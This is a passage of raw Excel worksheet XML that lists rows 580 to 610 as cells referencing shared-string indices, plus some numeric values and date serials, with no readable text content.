      <c r="P580" t="s">
        <v>512</v>
      </c>
      <c r="Q580" s="95" t="s">
        <v>1860</v>
      </c>
      <c r="W580" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="581" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A581" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B581" s="52"/>
      <c r="C581" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D581" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E581" s="95" t="s">
        <v>2002</v>
      </c>
      <c r="F581" s="42">
        <v>200</v>
      </c>
      <c r="G581" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H581" t="s">
        <v>2003</v>
      </c>
      <c r="I581" t="s">
        <v>156</v>
      </c>
      <c r="J581" s="95" t="s">
        <v>226</v>
      </c>
      <c r="K581" s="95" t="s">
        <v>27</v>
      </c>
      <c r="L581" t="s">
        <v>77</v>
      </c>
      <c r="M581" s="95" t="s">
        <v>227</v>
      </c>
      <c r="N581" t="s">
        <v>228</v>
      </c>
      <c r="Q581" s="95" t="s">
        <v>2004</v>
      </c>
      <c r="W581" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="582" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A582" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B582" s="52"/>
      <c r="C582" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D582" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E582" s="95" t="s">
        <v>2002</v>
      </c>
      <c r="F582" s="42">
        <v>100</v>
      </c>
      <c r="G582" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H582" t="s">
        <v>2005</v>
      </c>
      <c r="I582" t="s">
        <v>156</v>
      </c>
      <c r="J582" s="95" t="s">
        <v>226</v>
      </c>
      <c r="K582" s="95" t="s">
        <v>27</v>
      </c>
      <c r="L582" t="s">
        <v>77</v>
      </c>
      <c r="M582" s="95" t="s">
        <v>227</v>
      </c>
      <c r="N582" t="s">
        <v>228</v>
      </c>
      <c r="Q582" s="95" t="s">
        <v>1133</v>
      </c>
      <c r="W582" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="583" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A583" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B583" s="52"/>
      <c r="C583" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D583" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E583" s="95" t="s">
        <v>2006</v>
      </c>
      <c r="F583" s="42">
        <v>200</v>
      </c>
      <c r="G583" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H583" t="s">
        <v>2007</v>
      </c>
      <c r="I583" t="s">
        <v>156</v>
      </c>
      <c r="J583" s="95" t="s">
        <v>226</v>
      </c>
      <c r="K583" s="95" t="s">
        <v>27</v>
      </c>
      <c r="L583" t="s">
        <v>77</v>
      </c>
      <c r="M583" s="95" t="s">
        <v>227</v>
      </c>
      <c r="N583" t="s">
        <v>228</v>
      </c>
      <c r="Q583" s="95" t="s">
        <v>2008</v>
      </c>
      <c r="W583" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="584" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A584" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B584" s="52"/>
      <c r="C584" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D584" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E584" s="95" t="s">
        <v>2006</v>
      </c>
      <c r="F584" s="42">
        <v>100</v>
      </c>
      <c r="G584" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H584" t="s">
        <v>2007</v>
      </c>
      <c r="I584" t="s">
        <v>156</v>
      </c>
      <c r="J584" s="95" t="s">
        <v>438</v>
      </c>
      <c r="K584" s="95" t="s">
        <v>27</v>
      </c>
      <c r="L584" t="s">
        <v>77</v>
      </c>
      <c r="M584" s="95" t="s">
        <v>509</v>
      </c>
      <c r="N584" t="s">
        <v>510</v>
      </c>
      <c r="Q584" s="95" t="s">
        <v>2009</v>
      </c>
      <c r="W584" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="585" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A585" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B585" s="52"/>
      <c r="C585" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D585" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E585" s="95" t="s">
        <v>2010</v>
      </c>
      <c r="F585" s="42">
        <v>100</v>
      </c>
      <c r="G585" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H585" t="s">
        <v>2011</v>
      </c>
      <c r="I585" t="s">
        <v>75</v>
      </c>
      <c r="J585" s="95" t="s">
        <v>454</v>
      </c>
      <c r="K585" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L585" t="s">
        <v>77</v>
      </c>
      <c r="Q585" s="95" t="s">
        <v>455</v>
      </c>
      <c r="W585" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="586" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A586" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B586" s="52"/>
      <c r="C586" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D586" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E586" s="95" t="s">
        <v>2012</v>
      </c>
      <c r="F586" s="42">
        <v>100</v>
      </c>
      <c r="G586" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H586" t="s">
        <v>2013</v>
      </c>
      <c r="I586" t="s">
        <v>75</v>
      </c>
      <c r="J586" s="95" t="s">
        <v>454</v>
      </c>
      <c r="K586" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L586" t="s">
        <v>77</v>
      </c>
      <c r="P586" t="s">
        <v>2014</v>
      </c>
      <c r="Q586" s="95" t="s">
        <v>176</v>
      </c>
      <c r="W586" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="587" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A587" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B587" s="52"/>
      <c r="C587" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D587" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E587" s="95" t="s">
        <v>2012</v>
      </c>
      <c r="F587" s="42">
        <v>200</v>
      </c>
      <c r="G587" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H587" t="s">
        <v>2015</v>
      </c>
      <c r="I587" t="s">
        <v>75</v>
      </c>
      <c r="J587" s="95" t="s">
        <v>454</v>
      </c>
      <c r="K587" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L587" t="s">
        <v>77</v>
      </c>
      <c r="P587" t="s">
        <v>2014</v>
      </c>
      <c r="Q587" s="95" t="s">
        <v>2016</v>
      </c>
      <c r="W587" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="588" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A588" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B588" s="52"/>
      <c r="C588" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D588" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E588" s="95" t="s">
        <v>2017</v>
      </c>
      <c r="F588" s="42">
        <v>100</v>
      </c>
      <c r="G588" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H588" t="s">
        <v>2018</v>
      </c>
      <c r="I588" t="s">
        <v>31</v>
      </c>
      <c r="J588" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K588" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L588" t="s">
        <v>77</v>
      </c>
      <c r="M588" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N588" t="s">
        <v>263</v>
      </c>
      <c r="P588" t="s">
        <v>2019</v>
      </c>
      <c r="Q588" s="95" t="s">
        <v>2020</v>
      </c>
      <c r="W588" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="589" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A589" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B589" s="52"/>
      <c r="C589" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D589" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E589" s="95" t="s">
        <v>2021</v>
      </c>
      <c r="F589" s="42">
        <v>100</v>
      </c>
      <c r="G589" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H589" t="s">
        <v>2022</v>
      </c>
      <c r="I589" t="s">
        <v>31</v>
      </c>
      <c r="J589" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K589" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L589" t="s">
        <v>77</v>
      </c>
      <c r="M589" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N589" t="s">
        <v>263</v>
      </c>
      <c r="Q589" s="95" t="s">
        <v>2023</v>
      </c>
      <c r="W589" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="590" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A590" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B590" s="52"/>
      <c r="C590" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D590" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E590" s="95" t="s">
        <v>2024</v>
      </c>
      <c r="F590" s="42">
        <v>100</v>
      </c>
      <c r="G590" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H590" t="s">
        <v>2025</v>
      </c>
      <c r="I590" t="s">
        <v>82</v>
      </c>
      <c r="J590" s="95" t="s">
        <v>43</v>
      </c>
      <c r="K590" s="95" t="s">
        <v>24</v>
      </c>
      <c r="L590" t="s">
        <v>83</v>
      </c>
      <c r="M590" s="95" t="s">
        <v>72</v>
      </c>
      <c r="P590" t="s">
        <v>2026</v>
      </c>
      <c r="Q590" s="95" t="s">
        <v>176</v>
      </c>
      <c r="W590" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="591" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A591" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B591" s="52"/>
      <c r="C591" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D591" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E591" s="95" t="s">
        <v>2027</v>
      </c>
      <c r="F591" s="42">
        <v>100</v>
      </c>
      <c r="G591" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H591" t="s">
        <v>2028</v>
      </c>
      <c r="I591" t="s">
        <v>75</v>
      </c>
      <c r="J591" s="95" t="s">
        <v>454</v>
      </c>
      <c r="K591" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L591" t="s">
        <v>77</v>
      </c>
      <c r="P591" t="s">
        <v>577</v>
      </c>
      <c r="Q591" s="95" t="s">
        <v>1607</v>
      </c>
      <c r="W591" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="592" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A592" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B592" s="52"/>
      <c r="C592" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D592" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E592" s="95" t="s">
        <v>2029</v>
      </c>
      <c r="F592" s="42">
        <v>100</v>
      </c>
      <c r="G592" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H592" t="s">
        <v>2030</v>
      </c>
      <c r="I592" t="s">
        <v>75</v>
      </c>
      <c r="J592" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K592" s="95" t="s">
        <v>15</v>
      </c>
      <c r="L592" t="s">
        <v>83</v>
      </c>
      <c r="M592" s="95" t="s">
        <v>90</v>
      </c>
      <c r="N592" t="s">
        <v>167</v>
      </c>
      <c r="P592" t="s">
        <v>168</v>
      </c>
      <c r="Q592" s="95" t="s">
        <v>2031</v>
      </c>
      <c r="W592" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="593" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A593" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B593" s="52"/>
      <c r="C593" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D593" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E593" s="95" t="s">
        <v>2032</v>
      </c>
      <c r="F593" s="42">
        <v>100</v>
      </c>
      <c r="G593" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H593" t="s">
        <v>2033</v>
      </c>
      <c r="I593" t="s">
        <v>196</v>
      </c>
      <c r="J593" s="95" t="s">
        <v>197</v>
      </c>
      <c r="K593" s="95" t="s">
        <v>18</v>
      </c>
      <c r="L593" t="s">
        <v>77</v>
      </c>
      <c r="M593" s="95" t="s">
        <v>18</v>
      </c>
      <c r="N593" t="s">
        <v>198</v>
      </c>
      <c r="P593" t="s">
        <v>242</v>
      </c>
      <c r="Q593" s="95" t="s">
        <v>2034</v>
      </c>
      <c r="W593" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="594" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A594" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B594" s="52"/>
      <c r="C594" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D594" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E594" s="95" t="s">
        <v>2035</v>
      </c>
      <c r="F594" s="42">
        <v>100</v>
      </c>
      <c r="G594" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H594" t="s">
        <v>2035</v>
      </c>
      <c r="I594" t="s">
        <v>210</v>
      </c>
      <c r="J594" s="95" t="s">
        <v>211</v>
      </c>
      <c r="K594" s="95" t="s">
        <v>30</v>
      </c>
      <c r="L594" t="s">
        <v>83</v>
      </c>
      <c r="M594" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q594" s="95" t="s">
        <v>176</v>
      </c>
      <c r="W594" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="595" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A595" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B595" s="52"/>
      <c r="C595" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D595" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E595" s="95" t="s">
        <v>2036</v>
      </c>
      <c r="F595" s="42">
        <v>200</v>
      </c>
      <c r="G595" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H595" t="s">
        <v>2037</v>
      </c>
      <c r="I595" t="s">
        <v>611</v>
      </c>
      <c r="J595" s="95" t="s">
        <v>612</v>
      </c>
      <c r="K595" s="95" t="s">
        <v>14</v>
      </c>
      <c r="L595" t="s">
        <v>77</v>
      </c>
      <c r="M595" s="95" t="s">
        <v>612</v>
      </c>
      <c r="N595" t="s">
        <v>613</v>
      </c>
      <c r="P595" t="s">
        <v>937</v>
      </c>
      <c r="Q595" s="95" t="s">
        <v>2038</v>
      </c>
      <c r="W595" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="596" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A596" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B596" s="52"/>
      <c r="C596" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D596" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E596" s="95" t="s">
        <v>2039</v>
      </c>
      <c r="F596" s="42">
        <v>100</v>
      </c>
      <c r="G596" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H596" t="s">
        <v>2040</v>
      </c>
      <c r="I596" t="s">
        <v>196</v>
      </c>
      <c r="J596" s="95" t="s">
        <v>197</v>
      </c>
      <c r="K596" s="95" t="s">
        <v>18</v>
      </c>
      <c r="L596" t="s">
        <v>77</v>
      </c>
      <c r="M596" s="95" t="s">
        <v>18</v>
      </c>
      <c r="N596" t="s">
        <v>198</v>
      </c>
      <c r="P596" t="s">
        <v>2041</v>
      </c>
      <c r="Q596" s="95" t="s">
        <v>2042</v>
      </c>
      <c r="W596" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="597" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A597" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B597" s="52"/>
      <c r="C597" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D597" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E597" s="95" t="s">
        <v>2043</v>
      </c>
      <c r="F597" s="42">
        <v>100</v>
      </c>
      <c r="G597" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H597" t="s">
        <v>2044</v>
      </c>
      <c r="I597" t="s">
        <v>196</v>
      </c>
      <c r="J597" s="95" t="s">
        <v>197</v>
      </c>
      <c r="K597" s="95" t="s">
        <v>18</v>
      </c>
      <c r="L597" t="s">
        <v>77</v>
      </c>
      <c r="M597" s="95" t="s">
        <v>18</v>
      </c>
      <c r="N597" t="s">
        <v>198</v>
      </c>
      <c r="P597" t="s">
        <v>2045</v>
      </c>
      <c r="Q597" s="95" t="s">
        <v>2046</v>
      </c>
      <c r="W597" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="598" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A598" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B598" s="52"/>
      <c r="C598" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D598" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E598" s="95" t="s">
        <v>2047</v>
      </c>
      <c r="F598" s="42">
        <v>110</v>
      </c>
      <c r="G598" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H598" t="s">
        <v>2048</v>
      </c>
      <c r="I598" t="s">
        <v>172</v>
      </c>
      <c r="J598" s="95" t="s">
        <v>173</v>
      </c>
      <c r="K598" s="95" t="s">
        <v>13</v>
      </c>
      <c r="L598" t="s">
        <v>83</v>
      </c>
      <c r="M598" s="95" t="s">
        <v>72</v>
      </c>
      <c r="N598" t="s">
        <v>174</v>
      </c>
      <c r="P598" t="s">
        <v>951</v>
      </c>
      <c r="Q598" s="95" t="s">
        <v>2049</v>
      </c>
      <c r="W598" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="599" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A599" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B599" s="52"/>
      <c r="C599" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D599" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E599" s="95" t="s">
        <v>2047</v>
      </c>
      <c r="F599" s="42">
        <v>200</v>
      </c>
      <c r="G599" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H599" t="s">
        <v>2048</v>
      </c>
      <c r="I599" t="s">
        <v>172</v>
      </c>
      <c r="J599" s="95" t="s">
        <v>173</v>
      </c>
      <c r="K599" s="95" t="s">
        <v>13</v>
      </c>
      <c r="L599" t="s">
        <v>83</v>
      </c>
      <c r="M599" s="95" t="s">
        <v>72</v>
      </c>
      <c r="N599" t="s">
        <v>174</v>
      </c>
      <c r="P599" t="s">
        <v>951</v>
      </c>
      <c r="Q599" s="95" t="s">
        <v>2050</v>
      </c>
      <c r="W599" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="600" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A600" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B600" s="52"/>
      <c r="C600" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D600" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E600" s="95" t="s">
        <v>2047</v>
      </c>
      <c r="F600" s="42">
        <v>100</v>
      </c>
      <c r="G600" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H600" t="s">
        <v>2048</v>
      </c>
      <c r="I600" t="s">
        <v>172</v>
      </c>
      <c r="J600" s="95" t="s">
        <v>173</v>
      </c>
      <c r="K600" s="95" t="s">
        <v>13</v>
      </c>
      <c r="L600" t="s">
        <v>83</v>
      </c>
      <c r="M600" s="95" t="s">
        <v>72</v>
      </c>
      <c r="N600" t="s">
        <v>174</v>
      </c>
      <c r="P600" t="s">
        <v>951</v>
      </c>
      <c r="Q600" s="95" t="s">
        <v>2051</v>
      </c>
      <c r="W600" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="601" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A601" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B601" s="52"/>
      <c r="C601" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D601" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E601" s="95" t="s">
        <v>2052</v>
      </c>
      <c r="F601" s="42">
        <v>100</v>
      </c>
      <c r="G601" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H601" t="s">
        <v>2053</v>
      </c>
      <c r="K601" s="95" t="s">
        <v>38</v>
      </c>
      <c r="L601" t="s">
        <v>38</v>
      </c>
      <c r="M601" s="95" t="s">
        <v>38</v>
      </c>
      <c r="N601" t="s">
        <v>38</v>
      </c>
      <c r="P601" t="s">
        <v>951</v>
      </c>
      <c r="Q601" s="95" t="s">
        <v>2051</v>
      </c>
      <c r="W601" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="602" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A602" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B602" s="52"/>
      <c r="C602" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D602" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E602" s="95" t="s">
        <v>2054</v>
      </c>
      <c r="F602" s="42">
        <v>100</v>
      </c>
      <c r="G602" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H602" t="s">
        <v>2055</v>
      </c>
      <c r="I602" t="s">
        <v>196</v>
      </c>
      <c r="J602" s="95" t="s">
        <v>722</v>
      </c>
      <c r="K602" s="95" t="s">
        <v>18</v>
      </c>
      <c r="L602" t="s">
        <v>77</v>
      </c>
      <c r="M602" s="95" t="s">
        <v>18</v>
      </c>
      <c r="N602" t="s">
        <v>198</v>
      </c>
      <c r="P602" t="s">
        <v>723</v>
      </c>
      <c r="Q602" s="95" t="s">
        <v>2056</v>
      </c>
      <c r="W602" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="603" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A603" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B603" s="52"/>
      <c r="C603" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D603" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E603" s="95" t="s">
        <v>2057</v>
      </c>
      <c r="F603" s="42">
        <v>100</v>
      </c>
      <c r="G603" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H603" t="s">
        <v>2058</v>
      </c>
      <c r="I603" t="s">
        <v>156</v>
      </c>
      <c r="J603" s="95" t="s">
        <v>438</v>
      </c>
      <c r="K603" s="95" t="s">
        <v>27</v>
      </c>
      <c r="L603" t="s">
        <v>77</v>
      </c>
      <c r="M603" s="95" t="s">
        <v>509</v>
      </c>
      <c r="N603" t="s">
        <v>510</v>
      </c>
      <c r="P603" t="s">
        <v>2059</v>
      </c>
      <c r="Q603" s="95" t="s">
        <v>2060</v>
      </c>
      <c r="W603" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="604" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A604" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B604" s="52"/>
      <c r="C604" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D604" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E604" s="95" t="s">
        <v>2061</v>
      </c>
      <c r="F604" s="42">
        <v>100</v>
      </c>
      <c r="G604" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H604" t="s">
        <v>2062</v>
      </c>
      <c r="I604" t="s">
        <v>82</v>
      </c>
      <c r="J604" s="95" t="s">
        <v>32</v>
      </c>
      <c r="K604" s="95" t="s">
        <v>32</v>
      </c>
      <c r="L604" t="s">
        <v>83</v>
      </c>
      <c r="M604" s="95" t="s">
        <v>72</v>
      </c>
      <c r="P604" t="s">
        <v>78</v>
      </c>
      <c r="Q604" s="95" t="s">
        <v>396</v>
      </c>
      <c r="W604" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="605" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A605" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B605" s="52"/>
      <c r="C605" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D605" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E605" s="95" t="s">
        <v>2063</v>
      </c>
      <c r="F605" s="42">
        <v>100</v>
      </c>
      <c r="G605" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H605" t="s">
        <v>2064</v>
      </c>
      <c r="I605" t="s">
        <v>82</v>
      </c>
      <c r="J605" s="95" t="s">
        <v>32</v>
      </c>
      <c r="K605" s="95" t="s">
        <v>32</v>
      </c>
      <c r="L605" t="s">
        <v>83</v>
      </c>
      <c r="M605" s="95" t="s">
        <v>72</v>
      </c>
      <c r="P605" t="s">
        <v>2065</v>
      </c>
      <c r="Q605" s="95" t="s">
        <v>2066</v>
      </c>
      <c r="W605" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="606" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A606" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B606" s="52"/>
      <c r="C606" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D606" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E606" s="95" t="s">
        <v>2067</v>
      </c>
      <c r="F606" s="42">
        <v>200</v>
      </c>
      <c r="G606" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H606" t="s">
        <v>2068</v>
      </c>
      <c r="I606" t="s">
        <v>611</v>
      </c>
      <c r="J606" s="95" t="s">
        <v>612</v>
      </c>
      <c r="K606" s="95" t="s">
        <v>14</v>
      </c>
      <c r="L606" t="s">
        <v>77</v>
      </c>
      <c r="M606" s="95" t="s">
        <v>612</v>
      </c>
      <c r="N606" t="s">
        <v>613</v>
      </c>
      <c r="P606" t="s">
        <v>937</v>
      </c>
      <c r="Q606" s="95" t="s">
        <v>2069</v>
      </c>
      <c r="W606" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="607" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A607" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B607" s="52"/>
      <c r="C607" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D607" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E607" s="95" t="s">
        <v>2067</v>
      </c>
      <c r="F607" s="42">
        <v>500</v>
      </c>
      <c r="G607" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H607" t="s">
        <v>2068</v>
      </c>
      <c r="I607" t="s">
        <v>611</v>
      </c>
      <c r="J607" s="95" t="s">
        <v>612</v>
      </c>
      <c r="K607" s="95" t="s">
        <v>14</v>
      </c>
      <c r="L607" t="s">
        <v>77</v>
      </c>
      <c r="M607" s="95" t="s">
        <v>612</v>
      </c>
      <c r="N607" t="s">
        <v>613</v>
      </c>
      <c r="P607" t="s">
        <v>2070</v>
      </c>
      <c r="Q607" s="95" t="s">
        <v>2071</v>
      </c>
      <c r="W607" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="608" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A608" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B608" s="52">
        <v>44041.707096238424</v>
      </c>
      <c r="C608" s="95" t="s">
        <v>2072</v>
      </c>
      <c r="D608" s="96">
        <v>101</v>
      </c>
      <c r="E608" s="95" t="s">
        <v>2073</v>
      </c>
      <c r="F608" s="42">
        <v>101</v>
      </c>
      <c r="G608" s="95" t="s">
        <v>2074</v>
      </c>
      <c r="H608" t="s">
        <v>146</v>
      </c>
      <c r="I608" t="s">
        <v>103</v>
      </c>
      <c r="J608" s="95" t="s">
        <v>147</v>
      </c>
      <c r="K608" s="95" t="s">
        <v>35</v>
      </c>
      <c r="L608" t="s">
        <v>83</v>
      </c>
      <c r="M608" s="95" t="s">
        <v>148</v>
      </c>
      <c r="N608" t="s">
        <v>149</v>
      </c>
      <c r="O608" s="95" t="s">
        <v>150</v>
      </c>
      <c r="Q608" s="95" t="s">
        <v>151</v>
      </c>
      <c r="R608">
        <v>108</v>
      </c>
      <c r="S608">
        <v>33</v>
      </c>
      <c r="W608" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="609" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A609" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B609" s="52">
        <v>43946.014389328702</v>
      </c>
      <c r="C609" s="95" t="s">
        <v>2075</v>
      </c>
      <c r="D609" s="96">
        <v>106</v>
      </c>
      <c r="E609" s="95" t="s">
        <v>2076</v>
      </c>
      <c r="F609" s="42">
        <v>106</v>
      </c>
      <c r="G609" s="95" t="s">
        <v>2077</v>
      </c>
      <c r="H609" t="s">
        <v>2078</v>
      </c>
      <c r="I609" t="s">
        <v>156</v>
      </c>
      <c r="J609" s="95" t="s">
        <v>301</v>
      </c>
      <c r="K609" s="95" t="s">
        <v>26</v>
      </c>
      <c r="L609" t="s">
        <v>77</v>
      </c>
      <c r="M609" s="95" t="s">
        <v>475</v>
      </c>
      <c r="N609" t="s">
        <v>476</v>
      </c>
      <c r="P609" t="s">
        <v>802</v>
      </c>
      <c r="Q609" s="95" t="s">
        <v>2079</v>
      </c>
      <c r="R609">
        <v>18810</v>
      </c>
      <c r="S609">
        <v>19842</v>
      </c>
      <c r="T609">
        <v>404249</v>
      </c>
      <c r="U609">
        <v>597621</v>
      </c>
      <c r="V609">
        <v>676318</v>
      </c>
      <c r="W609" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="610" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A610" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B610" s="52">
        <v>43571.429527280095</v>
      </c>
      <c r="C610" s="95" t="s">
        <v>2081</v>
      </c>
      <c r="D610" s="96">
        <v>133</v>
